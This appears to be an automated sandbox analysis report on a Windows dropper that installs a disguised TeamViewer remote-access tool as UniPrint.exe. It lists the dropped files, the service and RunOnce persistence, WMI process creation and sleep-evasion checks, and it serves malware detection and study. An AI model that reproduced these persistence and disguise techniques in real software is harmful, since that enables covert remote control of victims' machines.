Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70983850 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,
Source: wogZe27GBB.exeReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile read: C:\Users\user\Desktop\wogZe27GBB.exeJump to behavior
Source: wogZe27GBB.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\wogZe27GBB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\wogZe27GBB.exe 'C:\Users\user\Desktop\wogZe27GBB.exe'
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Users\user\Desktop\wogZe27GBB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004C6E36 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPCJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Local\Temp\nsaF7DE.tmpJump to behavior
Source: classification engineClassification label: mal76.evad.winEXE@23/18@4/5
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982AC0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,StrChrW,StrChrW,SysAllocString,StrChrW,SysAllocString,SysFreeString,VariantInit,VariantInit,StrChrW,StrChrW,lstrlenW,SysAllocStringLen,PathQuoteSpacesW,VariantInit,StrChrW,SysAllocString,StrChrW,VariantInit,StrChrW,StrChrW,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,74E3A680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70989B10 SwitchDesktop,SetThreadDesktop,LoadLibraryW,GetProcessHeap,HeapAlloc,RtlZeroMemory,GetSystemDirectoryW,PathAddBackslashW,lstrcatW,LoadLibraryExW,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,StrChrW,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70983DC0 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAAFKBAAAA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6032:120:WilError_01
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985180 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile written: C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.iniJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: wogZe27GBB.exeStatic file information: File size 1773472 > 1048576
Source: wogZe27GBB.exeStatic PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000002.516408588.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.351085287.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355552090.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.373259727.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000002.381228039.000000007098C000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0053E60D push ecx; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0053BD8D push ecx; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0295E1DD push esp; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02960970 push eax; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02935295 push ebx; iretd
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0293209A push ebx; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292D483 push ebx; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029304A8 push ebx; retn 0019h
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029314AE push ebx; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02931AD5 push ebx; iretd
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02931CC2 push ebx; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029308C9 push ebx; iretd
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292EEFF push 00000029h; iretd
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029330E2 push ebx; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02930E14 push ebx; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02931004 push cs; iretd
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02931836 push ebx; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02930039 push ebx; retf 0021h
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0293083E push ebx; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02933222 push ebx; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292D826 push ebx; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0293042A push ebx; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02933E40 push ebx; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0293027C push ebx; iretd
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292DC6A push ebx; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029363B2 push ebx; iretd
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029369B4 push ebx; iretd
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02936BA1 push ebx; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029351AA push ebx; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_029357DD push ebx; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_02936F17 push ebx; iretd
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dllJump to dropped file
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to dropped file
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\ParametersJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70983920 QueryServiceConfigW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,QueryServiceConfigW,ChangeServiceConfigW,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exeJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_00500C6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004FFF68
Source: C:\Windows\System32\svchost.exe TID: 6704Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 7164Thread sleep count: 103 > 30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 7164Thread sleep time: -51500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 2392Thread sleep count: 80 > 30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 2392Thread sleep time: -40000s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004FFF68
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
